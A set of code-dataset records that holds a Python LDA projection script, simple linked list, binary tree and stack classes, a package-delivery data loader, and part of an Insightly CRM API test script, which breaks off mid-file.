- LDA requires knowing the classes of the samples\r\n        - It can be good to first reduce the dimension using PCA, then project by class using LDA\r\n    Main source: http://sebastianraschka.com/Articles/2014_python_lda.html\r\n'''\r\n\r\n\r\ndef main(argv):\r\n    ## ------- WELCOMING C.L.I. ------- ## \r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"inputFile\", help=\"input file in Comma Separated Value format (with or without headers)\")\r\n    parser.add_argument(\"outputFile\", help=\"will contain the data projected in the Linear Discriminants' dimensions, output as CSV\")\r\n    parser.add_argument(\"labelCol\", help=\"Column number (counting from 0) containing the name of the class to which the sample belongs, should be a positive integer\", type=int)\r\n    parser.add_argument(\"-t\", \"--varThreshold\", help=\"cumulative variance threshold after which to drop the useless eigen vectors, default: 0.8\", type=float)\r\n    parser.add_argument(\"-ev\", \"--explainedVar\", help=\"output the explained variance along with the cumulative variance, should be a path where to save the image, if '-' the image will be shown but not saved\")\r\n    parser.add_argument(\"-pd\", \"--projectedData\", help=\"output the data projected in the first two Linear Discriminants' dimensions as a graph of scattered points, the more spread the better, should be a path where to save the image, if '-' the image will be shown but not saved\")\r\n    parser.add_argument(\"-pm\", \"--projectionMat\", help=\"path where to save the projection matrix used to project the data into the LDs' dimensions (as a binary Numpy file .npy)\")\r\n    parser.add_argument(\"-dn\", \"--dropNa\", help=\"exclude every row containing a null, invalid or infinite value. 
Solves the 'Input contains NaN, infinity or a value too large for dtype('float64')' issue\", action=\"store_true\")\r\n parser.add_argument(\"-v\", \"--verbose\", help=\"enable verbose and show graph as they get generated while still saving them\", action=\"store_true\")\r\n args = parser.parse_args()\r\n\r\n ## ------- ARGUMENTS ------- ## \r\n inputFile = args.inputFile\r\n outputFile = args.outputFile\r\n labelColIndex = np.abs(int(args.labelCol))\r\n varThreshold = 0.8 if not args.varThreshold else args.varThreshold\r\n explainedVarPath = args.explainedVar\r\n projectedDataPath = args.projectedData\r\n projectionMatPath = args.projectionMat\r\n dropNa = args.dropNa\r\n verbose = args.verbose\r\n\r\n ## ------- INPUTS ------- ##\r\n data = pd.read_csv(inputFile)\r\n if dropNa: # Drop every lines containing a NaN val, default: disabled\r\n data.dropna(inplace=True)\r\n # Drop empty lines at file-end\r\n data.dropna(how=\"all\", inplace=True)\r\n # Array containing each row's label (as string)\r\n strLabelVect = data.ix[:,labelColIndex].values\r\n # Transform the labels to integer (starting from 1)\r\n enc = LabelEncoder()\r\n labelEncoder = enc.fit(strLabelVect)\r\n labelVect = labelEncoder.transform(strLabelVect) + 1\r\n \r\n # Ex : labelDict = {1: 'class 1', 2: 'class 2', 3: 'class 3' ... etc }\r\n labelDict = dict()\r\n for key, val in zip(labelVect, strLabelVect):\r\n if not key in labelDict:\r\n labelDict[key] = val\r\n if verbose:\r\n print(\"Identified classes: \", labelDict)\r\n\r\n # Only keep rows with numerical data (float or int)\r\n data.drop(data.columns[[labelColIndex]], axis=1, inplace=True) # Remove label's col\r\n numData = data.ix[:,:]._get_numeric_data()\r\n if verbose:\r\n print(\"Numerical data from input:\\n\", numData.head(), \"\\n...\")\r\n # Convert from pandas dataframe to numpy array\r\n numData = numData.values\r\n ## COMPUTE D-DIMENSIONAL MEAN VECTOR ##\r\n # This vector contains the mean vector of each class\r\n # The mean vector is the mean of each feature of this class\r\n meanVects = []\r\n for label in set(labelVect):\r\n meanVects.append(np.mean(numData[labelVect==label], axis=0))\r\n if verbose:\r\n print(\"Mean vect class {}: \\n{}\".format(label, meanVects[label-1]))\r\n\r\n ## COMPUTE SCATTER MATRICES ##\r\n # -- Within-class scatter matrix (called sW)\r\n featureCount = numData.shape[1]\r\n sW = np.zeros((featureCount, featureCount))\r\n for label, meanVect in zip(set(labelVect), meanVects):\r\n classScatterMat = np.zeros_like(sW) # scatter matrix for class\r\n for row in numData[labelVect == label]:\r\n row = row.reshape(row.shape[0], 1)\r\n meanVect = meanVect.reshape(meanVect.shape[0], 1) # make col vect\r\n classScatterMat += (row-meanVect).dot((row-meanVect).T)\r\n sW += classScatterMat\r\n if verbose:\r\n print(\"Within-class scatter matrix: \\n\", sW)\r\n\r\n # -- Between-class scatter matrix (called sB)\r\n totalMean = np.mean(numData, axis=0)\r\n sB = np.zeros((featureCount, featureCount))\r\n for i, meanVect in enumerate(meanVects):\r\n n = numData[labelVect == i+1, :].shape[0]\r\n meanVect = np.array(meanVect) # avoid strange warning\r\n meanVect = meanVect.reshape(meanVect.shape[0], 1) # make col vect\r\n totalMean = np.array(totalMean) # avoid strange warning\r\n totalMean = totalMean.reshape(totalMean.shape[0], 1) # make col vect\r\n sB += n * (meanVect - totalMean).dot((meanVect - totalMean).T)\r\n\r\n if verbose:\r\n print(\"Between-class scatter matrix: \\n\", sB)\r\n\r\n ## CORE OF LDA ##\r\n eigVals, eigVects = 
np.linalg.eig(np.linalg.inv(sW).dot(sB))\r\n if verbose:\r\n for i in range(len(eigVals)):\r\n eigVect = eigVects[:,i].reshape(eigVects.shape[0], 1) # make col vect\r\n if eigVect.shape[0] < 7:\r\n print(\"Eigen vect {}: \\n{}\".format(i+1, eigVect.real))\r\n print(\"Eigen val {}: \\n{:.2e}\".format(i+1, eigVals[i].real))\r\n if i > 7:\r\n break\r\n # Checking if eigen vectors/values are alright\r\n print(\"Eigen Vects should be valid solution of sW^(-1)*sB*EigVect = EigVal*EigVect, checking...\", end=\"\\t\")\r\n for i in range(len(eigVals)):\r\n eigVect = eigVects[:,i].reshape(eigVects.shape[0], 1) # make col vect\r\n np.testing.assert_array_almost_equal(np.linalg.inv(sW).dot(sB).dot(eigVect).real,\r\n (eigVals[i] * eigVect).real,\r\n decimal=6,\r\n err_msg=\"Strange, the eigen vectors/values are wrong ?! This often occurs when the values are more than e+10, since numpy checks for differences in decimals regardless of the scale\",\r\n verbose=True)\r\n print(\"... Success !\")\r\n\r\n ## ------- SORT EIGEN VECTS BY EIGEN VALS ------- ##\r\n # \"The eigenvectors with the lowest eigenvalues bear the least information about the distribution of the data\"\r\n # Let's drop 'em\r\n\r\n # List of (eigVal, eigVect) tuples\r\n eigPairs = [(np.abs(eigVals[i]), eigVects[:,i]) for i in range(len(eigVals))]\r\n # Sort it\r\n eigPairs.sort(key=lambda x: x[0], reverse=True)\r\n if verbose and len(eigPairs) < 8:\r\n print(\"List of eigen vals in descending order:\", [i[0] for i in eigPairs])\r\n\r\n ## ------- EXPLAINED VARIANCE ------- ##\r\n eigSum = sum(eigVals)\r\n explnVar = [(i/eigSum)*100 for i in sorted(eigVals, reverse=True)]\r\n cumulativeExplnVar = np.cumsum(explnVar)\r\n if verbose:\r\n for i,j in enumerate(eigPairs):\r\n print(\"Eigen value {0:}: {1:.2%}\".format(i+1, (j[0]/eigSum).real))\r\n if i > 7:\r\n break\r\n ## ------- GRAPH EXPLAINED VAR ------- ##\r\n # Graph of the explained variance compared to the cumulative\r\n if not explainedVarPath is None:\r\n with plt.style.context(\"seaborn-whitegrid\"):\r\n plt.figure(figsize=(9, len(eigVals)))\r\n plt.bar(range(len(eigVals)), explnVar, alpha=0.5, align=\"center\", label=\"individual explained variance\")\r\n plt.step(range(len(eigVals)), cumulativeExplnVar, where=\"mid\", label=\"cumulative explained variance\")\r\n plt.ylabel(\"Explained variance ratio\")\r\n plt.xlabel(\"Eigen vects\")\r\n plt.legend(loc=\"best\")\r\n plt.tight_layout()\r\n if verbose or explainedVarPath == \"-\":\r\n plt.show()\r\n if explainedVarPath != \"-\":\r\n print(\"Explained Variance saved under : {}\".format(explainedVarPath))\r\n plt.savefig(explainedVarPath)\r\n\r\n ## ------- PROJECTION MATRIX ------- ##\r\n amountOfEigVectsToKeep = 0\r\n sortedEigVals = sorted(eigVals, reverse=True)\r\n while sum([sortedEigVals[i]/eigSum for i in range(amountOfEigVectsToKeep)]) < varThreshold:\r\n amountOfEigVectsToKeep += 1\r\n if verbose:\r\n varConserved = sum([sortedEigVals[i]/eigSum for i in range(amountOfEigVectsToKeep)]).real\r\n print(\"Amount of eigen vectors to keep to keep >={0:.2%} of information is {1:}, keeping {2:.2%} variance\".format(varThreshold, amountOfEigVectsToKeep, varConserved))\r\n \r\n # Create the projection matrix using the minimum amount of eigen vects to keep to reach the threshold\r\n eigVectsForLDA = []\r\n for i in range(amountOfEigVectsToKeep):\r\n eigVectLen = len(eigPairs[i][1])\r\n # Tilt the eig vects on their side to get vectors and not lists\r\n eigVectsForLDA.append(eigPairs[i][1].reshape(eigVectLen, 1))\r\n # Combine each eig 
vects horizontally to get a numberOfInputFeatures x amountOfEigVectsToKeep projection matrix\r\n # in which the data dimension is optimally reduced\r\n matW = np.hstack(tuple(eigVectsForLDA)).real\r\n if verbose:\r\n print(\"Projection Matrix (matrix W):\\n\", matW)\r\n \r\n ## ------- SAVE PROJECTION MATRIX ------- ##\r\n if not projectionMatPath is None:\r\n print(\"Projection Matrix (matrix W) saved under: {} in Numpy binary format (.npy)\".format(projectionMatPath))\r\n np.save(projectionMatPath, matW)\r\n\r\n ## PROJECT DATA ONTO NEW SUBSPACE ##\r\n Y = numData.dot(matW).real\r\n print(\"Input dimensions: {0:}\\nOutput dimensions: {1:}\\nReduction: {2:.2%}\".format(numData.shape[1], Y.shape[1], 1-Y.shape[1]/numData.shape[1]))\r\n assert Y.shape == (numData.shape[0], amountOfEigVectsToKeep), \"The matrix is not {}x{} dimensional !!\".format(numData.shape[0], amountOfEigVectsToKeep)\r\n ## ------- GRAPH PROJECTION DATA ------- ##\r\n # Show a representation in 2D\r\n if not projectedDataPath is None and Y.shape[1] >= 2:\r\n with plt.style.context(\"seaborn-whitegrid\"):\r\n plt.figure(figsize=(40, 20))\r\n ax = plt.subplot(111)\r\n # Generate unique label colour\r\n dicoLabelColor = dict()\r\n listColors = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\r\n for i in range(max(labelVect)):\r\n dicoLabelColor[i+1] = listColors[(i+1)%len(listColors)]\r\n\r\n Y_round = np.around(Y, decimals=2)\r\n for lab in set(labelVect):\r\n # Col 0 is first PC, col 1 is second PC\r\n x = Y_round[lab==labelVect, 0]\r\n y = Y_round[lab==labelVect, 1]\r\n plt.scatter(x, y, alpha=0.5, label=labelDict[lab], c=dicoLabelColor[lab], marker=\".\", s=500)\r\n plt.xlabel(\"LD 1\")\r\n plt.ylabel(\"LD 2\")\r\n legend = plt.legend(loc=\"upper right\", fancybox=True)\r\n legend.get_frame().set_alpha(0.5)\r\n plt.title(\"LDA: {} projection onto the first 2 linear discriminant\".format(inputFile))\r\n # hide axis ticks\r\n plt.tick_params(axis='both', which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\", labelleft=\"on\")\r\n # remove axis spines\r\n ax.spines[\"top\"].set_visible(False) \r\n ax.spines[\"right\"].set_visible(False)\r\n ax.spines[\"bottom\"].set_visible(False)\r\n ax.spines[\"left\"].set_visible(False) \r\n plt.grid()\r\n plt.tight_layout()\r\n if verbose or projectedDataPath == \"-\":\r\n plt.show()\r\n if projectedDataPath != \"-\":\r\n print(\"Projection in 2D using the new LD axis saved under : {}\".format(projectedDataPath))\r\n plt.savefig(projectedDataPath)\r\n\r\n columns = [\"LD{}\".format(i+1) for i in range(Y.shape[1])]\r\n columns.append(\"class\")\r\n labelCol = np.array([labelDict[label] for label in labelVect]).reshape(labelVect.shape[0], 1)\r\n Y = np.append(Y, labelCol, axis=1)\r\n Y = pd.DataFrame(Y, columns=columns)\r\n Y.to_csv(outputFile, sep=\",\", encoding=\"utf-8\", index=False)\r\n print(\"Projected data saved under: {}\".format(outputFile))\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])","sub_path":"scripts/automatic_lda.py","file_name":"automatic_lda.py","file_ext":"py","file_size_in_byte":13224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447668642","text":"\"\"\" Sort Demonstrator/Structures\r\n Author: Victoria Jurkfitz Kessler Thibes\r\n Date: Dec. 
02, 2016\r\n Course: CST8333 - Programming Language Research Project\r\n\"\"\"\r\n\r\nfrom copy import deepcopy\r\n\r\nclass LinkedList:\r\n \"\"\" Implements a linked list with one node and a link to another \"\"\"\r\n\r\n node_data = ''\r\n # Data for this node\r\n\r\n next_node = ''\r\n # Next node in the list\r\n\r\n def __init__(self, data):\r\n \"\"\" Constructor \"\"\"\r\n if len(data) > 0:\r\n data_copy = deepcopy(data)\r\n\r\n # Takes first item from array\r\n self.node_data = data_copy.pop(0)\r\n\r\n # Next node is constructed until original array is empty\r\n if len(data_copy) > 0:\r\n self.next_node = LinkedList(data_copy)\r\n\r\n def get_string(self):\r\n \"\"\"\" Used to print results \"\"\"\r\n\r\n if self.next_node != '':\r\n return str(self.node_data) + \" | Next node: \" + str(self.next_node.node_data) + \"\\n\" + self.next_node.get_string()\r\n\r\n else:\r\n return str(self.node_data) + \" | Next node: empty\"\r\n\r\n def insert(self,data):\r\n\r\n if self.next_node == '':\r\n self.next_node = LinkedList(data)\r\n\r\n else:\r\n self.next_node.insert(data)\r\n\r\n\r\nclass BinaryTree:\r\n \"\"\" Implements a binary tree \"\"\"\r\n\r\n parent = ''\r\n # Parent node\r\n\r\n node_data = ''\r\n # Current node's data\r\n\r\n left = ''\r\n # Children to the left\r\n\r\n right = ''\r\n # Children to the right\r\n\r\n def __init__(self,data,parent):\r\n \"\"\" Constructor \"\"\"\r\n\r\n self.parent = parent\r\n\r\n if len(data) > 0:\r\n # Takes the middle item from the array\r\n mid = data.pop(int(len(data)/2))\r\n self.node_data = mid\r\n\r\n if len(data) > 0:\r\n # Next half of the array is linked to the right\r\n self.right = BinaryTree(data[int(len(data)/2):],self)\r\n if self.right.node_data == '':\r\n self.right = ''\r\n\r\n if len(data) > 0:\r\n # Previous half of the array is linked to the left\r\n self.left = BinaryTree(data[:int(len(data)/2)],self)\r\n if self.left.node_data == '':\r\n self.left = ''\r\n\r\n def get_string(self):\r\n \"\"\" Called to show results \"\"\"\r\n\r\n if self.right != '' and self.right.node_data == '':\r\n self.right = ''\r\n\r\n if self.left != '' and self.left.node_data == '':\r\n self.left = ''\r\n\r\n return_string = str(self.node_data) + \"\\tParent: \"\r\n\r\n if self.parent != '':\r\n return_string += str(self.parent.node_data)\r\n\r\n else:\r\n return_string += \" None\"\r\n\r\n return_string += \"\\tChildren: \"\r\n\r\n if self.right != '' and self.left != '':\r\n children_string = str(self.left.node_data) + \",\" + str(self.right.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.left.get_string() + \"\\n\" + self.right.get_string()\r\n\r\n elif self.right != '':\r\n children_string = str(self.right.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.right.get_string()\r\n\r\n elif self.left != '':\r\n children_string = str(self.left.node_data) + \"\\t\\n\"\r\n\r\n return return_string + children_string + self.left.get_string()\r\n\r\n else:\r\n return return_string + \"None\"\r\n\r\n\r\nclass Stack:\r\n \"\"\"\" Implements a stack \"\"\"\r\n\r\n node_data = ''\r\n # Current node's data\r\n\r\n next_node = ''\r\n # Next item on the stack\r\n\r\n def __init__(self,data):\r\n \"\"\" Constructor \"\"\"\r\n if len(data) > 0:\r\n self.node_data = data.pop()\r\n\r\n if len(data) > 0:\r\n self.next_node = Stack(data)\r\n\r\n def pop(self):\r\n \"\"\"\" Takes the first node out of the stack \"\"\"\r\n popped = self.node_data\r\n\r\n if self.next_node != '':\r\n self.node_data = 
self.next_node.node_data\r\n self.next_node = self.next_node.next_node\r\n\r\n else:\r\n self.node_data = ''\r\n\r\n return popped\r\n\r\n def push(self,data):\r\n \"\"\"\" Puts a new node on top of the stack \"\"\"\r\n if self.next_node != '':\r\n self.next_node.push(self.node_data)\r\n self.node_data = data\r\n\r\n else:\r\n self.next_node = Stack([self.node_data])\r\n self.node_data = data\r\n\r\n def get_string(self):\r\n \"\"\"\" Called to print results \"\"\"\r\n if self.next_node != '' and self.next_node.node_data == '':\r\n self.next_node = ''\r\n\r\n if self.next_node != '':\r\n return \"\\t\" + str(self.node_data) + \"\\n\" + self.next_node.get_string()\r\n\r\n else:\r\n # Last node is at the bottom\r\n return \"Bottom: \" + str(self.node_data)\r\n\r\n","sub_path":"Python_Sorter/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458546517","text":"# Dawei Li, 001022014\n\nimport re\nfrom .hash_table import MyHashTable\nfrom datetime import datetime\nfrom .read_xlsx import XlsxReader\n\n\n# Create two global variables to hold package and distance data\n# to be used across modules.\npackage_data = None\ndistance_data = None\ntotal_distance = 0\n\n\ndef init():\n read_package_data()\n read_distance_data()\n\n\ndef read_package_data():\n \"\"\"Read package data into a hash table\"\"\"\n # Create an empty hash table to store package data\n # Key: package ID\n # Value: a hash table holding package details\n global package_data\n package_reader = XlsxReader(file_loc=\"./data/WGUPS Package File.xlsx\")\n rawdata = package_reader.read_data_sheet(0)\n package_data = MyHashTable()\n for row in range(8, rawdata.nrows):\n # Package id is the key\n id = rawdata.cell_value(row, 0)\n # Use a hash table to store package details\n hash_table = MyHashTable()\n # Package 9 has a wrong address.\n if row == 16:\n hash_table.add(\"address\", \"410 S State St\")\n else:\n hash_table.add(\"address\", rawdata.cell_value(row, 1))\n hash_table.add(\"city\", rawdata.cell_value(row, 2))\n hash_table.add(\"state\", rawdata.cell_value(row, 3))\n hash_table.add(\"zip\", rawdata.cell_value(row, 4))\n hash_table.add(\"deadline\", deadline(rawdata.cell_value(row, 5)))\n hash_table.add(\"weight\", rawdata.cell_value(row, 6))\n hash_table.add(\"notes\", rawdata.cell_value(row, 7))\n # Add and initialize two additional attributes\n hash_table.add(\"status\", \"idle\")\n hash_table.add(\"delivery time\", None)\n # Add package id (key) and details (value) to the hash table\n package_data.add(id, hash_table)\n\n\ndef deadline(time):\n \"\"\"Convert the deadline data in the EOD column in the package excel file to datetime format\"\"\"\n # If time is \"EOD\", convert it to 17:00\n if time == \"EOD\":\n return datetime(2019, 11, 22, 17)\n time = int(time * 24 * 3600)\n hour = time // 3600\n minute = (time % 3600) // 60\n return datetime(2019, 11, 22, hour, minute)\n\n\ndef read_distance_data():\n \"\"\"Read distance data into a hash table\"\"\"\n # Create an empty hash table to store distance data\n # Key: a tuple of two locations\n # Value: distance between the two locations in the key\n global distance_data\n distance_reader = XlsxReader(file_loc=\"./data/WGUPS Distance Table.xlsx\")\n rawdata = distance_reader.read_data_sheet(0)\n distance_data = MyHashTable()\n # First extract only street number and street name\n # from the full address. 
This combination matches the \n # address data in the packages data\n addresses = []\n col = 0\n for row in range(8, rawdata.nrows):\n value = rawdata.cell_value(row, col)\n value = re.split(r'\\s*\\n\\s*', value)[1]\n value = re.split(r'\\,', value)[0]\n # Correct a mismatch between the distance file and the package file\n if value == \"3575 W Valley Central Sta bus Loop\":\n value = \"3575 W Valley Central Station bus Loop\"\n addresses.append(value)\n # Extract distance data into the hash table\n for row in range(8, rawdata.nrows):\n for i in range(2, row-7):\n address_tuple = (addresses[row-8], addresses[i-2])\n distance = rawdata.cell_value(row, i)\n distance_data.add(address_tuple, distance)\n for j in range(row+1, rawdata.nrows):\n address_tuple = (addresses[j-8], addresses[row-8])\n distance = rawdata.cell_value(j, row-6)\n distance_data.add(address_tuple, distance)\n # Two packages may be delivered to the same address.\n # So set the distance of a location to itself as 0.\n address_tuple = (addresses[row-8], addresses[row-8])\n distance_data.add(address_tuple, 0)\n\n\ndef all_status():\n \"\"\"Return a hash table of (id, status) for all packages.\"\"\"\n global package_data\n all_status = MyHashTable()\n packages_id = package_data.all_keys()\n for id in packages_id:\n status = package_data.get(id).get(\"status\")\n delivery_time = package_data.get(id).get(\"delivery time\")\n all_status.add(id, (status, delivery_time))\n print(id, \" \", (status, delivery_time))\n return all_status\n","sub_path":"packages/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336803181","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n# Insightly API Test Script\n# Brian McConnell <brian@insightly.com>\n#\n# This Python module implements a test suite against the API. This allows users to create\n# whatever test cases they want in addition to the standard set of tests we run against\n# API endpoints.\n#\n# USAGE:\n#\n# i = Insightly()\n# i.test()\n#\n# NOTE:\n#\n# If you run the test suite, we recommend running it against a test instance with dummy data,\n# as there is the potential for data loss. The test suite is primarily intended for use in\n# QA testing. 
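Each test block below reads, creates, updates and then deletes records, so point it at disposable data.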
\n\nfrom insightly import Insightly\n\nget_endpoints = ['activitysets', 'contacts', 'countries', 'currencies', 'customfieldgroups', 'customfields', 'emails', 'filecategories','follows',\n 'instance','leads','leadsources','leadstatuses','notes','opportunities','opportunitycategories','opportunitystatereasons',\n 'organisations','pipelines','pipelinestages','projectcategories','projects','relationships','taskcategories','tasks','teammembers','teams','users']\n\ndef test(apikey='', version='2.2', dev=None):\n i = Insightly(apikey=apikey, version=version, dev=dev, test=True)\n i.tests_run = 0\n i.tests_passed = 0\n # test activity sets\n activity_sets = i.read('activitysets')\n if activity_sets is not None:\n activity_set_id = activity_sets[0]['ACTIVITYSET_ID']\n activity_set = i.read('activitysets', id=activity_set_id)\n # test contacts\n contacts = i.read('contacts')\n if contacts is not None:\n contact_id = contacts[0]['CONTACT_ID']\n contact = i.read('contacts', id=contact_id)\n contact = {'FIRST_NAME':'Test','LAST_NAME':'ミスターマコーネル'}\n contact = i.create('contacts', contact)\n if contact is not None:\n contact['FIRST_NAME'] = 'Foo'\n contact = i.update('contacts', contact)\n contact_id = contact['CONTACT_ID']\n i.upload_image('contacts', contact_id, 'apollo17.jpg')\n address = i.create_child('contacts', contact_id, 'addresses', {'ADDRESS_TYPE':'HOME','CITY':'San Francisco', 'STATE':'CA', 'COUNTRY':'United States'})\n if address is not None:\n address_id = address['ADDRESS_ID']\n i.delete('contacts',contact_id,sub_type='addresses',sub_type_id=address_id)\n contactinfo = i.create_child('contacts', contact_id, 'contactinfos', {'TYPE':'EMAIL','SUBTYPE':'Home','DETAIL':'foo@bar.com'})\n if contactinfo is not None:\n contact_info_id = contactinfo['CONTACT_INFO_ID']\n i.delete('contacts', contact_id, sub_type='contactinfos', sub_type_id = contact_info_id)\n contact_date = {'OCCASION_NAME':'Birthday','OCCASION_DATE':'2016-05-02T12:00:00Z'}\n contact_date = i.create_child('contacts', contact_id, 'dates', contact_date)\n if contact_date is not None:\n date_id = contact_date['DATE_ID']\n i.delete('contacts', contact_id, sub_type='dates', sub_type_id=date_id)\n tag = {'TAG_NAME':'foo'}\n i.create_child('contacts', contact_id, 'tags', tag)\n i.delete('contacts', contact_id,sub_type='tags', sub_type_id = 'foo')\n note = {'TITLE':'Test', 'BODY':'This is the body'}\n note = i.create_child('contacts', contact_id, 'notes', note)\n events = i.read('contacts', contact_id, sub_type='events')\n file_attachments = i.read('contacts', contact_id, sub_type='fileattachments')\n i.upload('contacts', contact_id, 'apollo17.jpg')\n i.create_child('contacts', contact_id, 'follow', {})\n i.delete('contacts', contact_id, sub_type='follow')\n tasks = i.read('contacts', contact_id, sub_type='tasks')\n emails = i.read('contacts', contact_id, sub_type='emails')\n i.delete('contacts', contact_id)\n countries = i.read('countries')\n currencies = i.read('currencies')\n custom_field_groups = i.read('customfieldgroups')\n custom_fields = i.read('customfields')\n if custom_fields is not None:\n custom_field_id = custom_fields[0]['CUSTOM_FIELD_ID']\n custom_field = i.read('customfields', custom_field_id)\n emails = i.read('emails')\n if emails is not None:\n email_id = emails[0]['EMAIL_ID']\n email = i.read('emails', email_id)\n i.create_child('emails', email_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('emails', email_id, sub_type='tags', sub_type_id = 'foo')\n comments = i.read('emails', email_id, sub_type='/comments')\n events = 
i.read('events')\n file_categories = i.read('filecategories')\n if file_categories is not None:\n file_category_id = file_categories[0]['CATEGORY_ID']\n file_category = i.read('filecategories', file_category_id)\n follows = i.read('follows') \n instance = i.read('instance')\n leads = i.read('leads')\n if leads is not None:\n lead_id = leads[0]['LEAD_ID']\n lead = i.read('leads', lead_id)\n lead = i.create('leads', {'FIRST_NAME':'foo', 'LAST_NAME':'bar'})\n if lead is not None:\n lead_id = lead['LEAD_ID']\n lead['FIRST_NAME']='foozle'\n lead = i.update('leads', lead)\n i.upload_image('leads', lead_id, 'apollo17.jpg')\n i.delete('leads', lead_id, sub_type='image')\n i.create_child('leads', lead_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('leads', lead_id, sub_type='tags', sub_type_id='foo')\n i.create_child('leads', lead_id, 'follow', {})\n i.delete('leads', lead_id, sub_type='follow')\n notes = i.read('leads', lead_id, sub_type='notes')\n i.create_child('leads', lead_id, 'notes', {'TITLE':'foo','BODY':'This is the body'})\n events = i.read('leads', lead_id, sub_type='events')\n file_attachments = i.read('leads', lead_id, sub_type='fileattachments')\n i.upload('leads', lead_id, 'apollo17.jpg')\n tasks = i.read('leads', lead_id, sub_type='tasks')\n emails = i.read('leads', lead_id, sub_type='emails')\n i.delete('leads', lead_id)\n leadsources = i.read('leadsources')\n lead_source = i.create('leadsources', {'LEAD_SOURCE':'Foozle Barzle'})\n if lead_source is not None:\n lead_source['LEAD_SOURCE'] = 'Barzle Foozle'\n lead_source_id = lead_source['LEAD_SOURCE_ID']\n lead_source = i.update('leadsources', lead_source)\n i.delete('leadsources', lead_source_id)\n lead_statuses = i.read('leadstatuses')\n lead_status = i.create('leadstatuses', {'LEAD_STATUS':'Foozle'})\n if lead_status is not None:\n lead_status_id = lead_status['LEAD_STATUS_ID']\n lead_status['LEAD_STATUS']='Barzle'\n lead_status['STATUS_TYPE']=1\n lead_status = i.update('leadstatuses', lead_status)\n i.delete('leadstatuses', lead_status_id)\n notes = i.read('notes')\n if notes is not None:\n note_id = notes[0]['NOTE_ID']\n note = i.read('notes', note_id)\n file_attachments = i.read('notes', note_id, sub_type='fileattachments')\n i.create_child('notes', note_id, 'follow', {})\n i.delete('notes', note_id, sub_type='follow')\n comments = i.read('notes', note_id, sub_type='comments')\n opportunities = i.read('opportunities')\n if opportunities is not None:\n opportunity_id = opportunities[0]['OPPORTUNITY_ID']\n opportunity = i.read('opportunities', opportunity_id)\n opportunity = i.create('opportunities', {'OPPORTUNITY_NAME':'Foozle','OPPORTUNITY_STATE':'Open'})\n if opportunity is not None:\n opportunity['OPPORTUNITY_NAME'] = 'Barzle'\n opportunity_id = opportunity['OPPORTUNITY_ID']\n opportunity = i.update('opportunities', opportunity)\n i.upload_image('opportunities', opportunity_id, 'apollo17.jpg')\n i.delete('opportunities', opportunity_id, 'image')\n i.create_child('opportunities', opportunity_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('opportunities', opportunity_id, sub_type='tags', sub_type_id='foo')\n notes = i.read('opportunities', opportunity_id, sub_type='notes')\n i.create_child('opportunities', opportunity_id, 'notes', {'TITLE':'foo','BODY':'This is a test'})\n events = i.read('opportunities', opportunity_id, sub_type='events')\n file_attachments = i.read('opportunities', opportunity_id, sub_type='fileattachments')\n i.upload('opportunities', opportunity_id, 'apollo17.jpg')\n i.create_child('opportunities', opportunity_id, 
'follow', {})\n i.delete('opportunities', opportunity_id, sub_type='follow')\n # add call to update opportunity state/state reason here\n opportunity_state_reasons = i.read('opportunities', opportunity_id, sub_type='statehistory')\n tasks = i.read('opportunities', opportunity_id, sub_type='tasks')\n emails = i.read('opportunities', opportunity_id, sub_type='emails')\n email = i.read('opportunities', opportunity_id, sub_type='linkemailaddress')\n i.delete('opportunities', opportunity_id, sub_type='pipeline')\n i.delete('opportunities', opportunity_id)\n opportunity_categories = i.read('opportunitycategories')\n opportunity_state_reasons = i.read('opportunitystatereasons')\n \n organisations = i.read('organisations')\n if organisations is not None:\n organisation_id = organisations[0]['ORGANISATION_ID']\n organisation = i.read('organisations', organisation_id)\n organisation = i.create('organisations', {'ORGANISATION_NAME':'Foo Corporation'})\n if organisation is not None:\n organisation_id = organisation['ORGANISATION_ID']\n organisation['ORGANISATION_NAME']='Bar Corporation'\n organisation = i.update('organisations', organisation)\n address = i.create_child('organisations', organisation_id, 'addresses', {'CITY':'San Francisco', 'STATE':'CA', 'COUNTRY':'United States', 'ADDRESS_TYPE':'Work'})\n if address is not None:\n address_id = address['ADDRESS_ID']\n i.delete('organisations', organisation_id, sub_type='addresses', sub_type_id=address_id)\n contactinfo = i.create_child('organisations', organisation_id, 'contactinfos', {'TYPE':'EMAIL','SUBTYPE':'Home','DETAIL':'foo@bar.com'})\n if contactinfo is not None:\n contact_info_id = contactinfo['CONTACT_INFO_ID']\n i.delete('organisations', organisation_id, sub_type='contactinfos', sub_type_id=contact_info_id)\n odate = i.create_child('organisations', organisation_id, 'dates', {'OCCASION_NAME':'Birthday','OCCASION_DATE':'2016-05-02T12:00:00Z'})\n if odate is not None:\n date_id = odate['DATE_ID']\n i.delete('organisations', organisation_id, sub_type='dates', sub_type_id=date_id)\n i.create_child('organisations', organisation_id, 'tags', {'TAG_NAME':'foo'})\n i.delete('organisations',organisation_id, sub_type='tags', sub_type_id='foo')\n i.upload_image('organisations', organisation_id, 'apollo17.jpg')\n i.delete('organisations', organisation_id, sub_type='image')\n notes = i.read('organisations', organisation_id, sub_type='notes')\n i.create_child('organisations', organisation_id, 'notes', {'TITLE':'Title','BODY':'This is the body'})\n events = i.read('organisations', organisation_id, sub_type='events')\n file_attachments = i.read('organisations', organisation_id, sub_type='fileattachments')\n i.upload('organisations', organisation_id, 'apollo17.jpg')\n i.create_child('organisations', organisation_id, 'follow', {})\n i.delete('organisations', organisation_id, sub_type='follow')\n emails = i.read('organisations', organisation_id, sub_type='emails')\n tasks = i.read('organisations', organisation_id, sub_type='tasks')\n i.delete('organisations', organisation_id)\n \n pipelines = i.read('pipelines')\n if 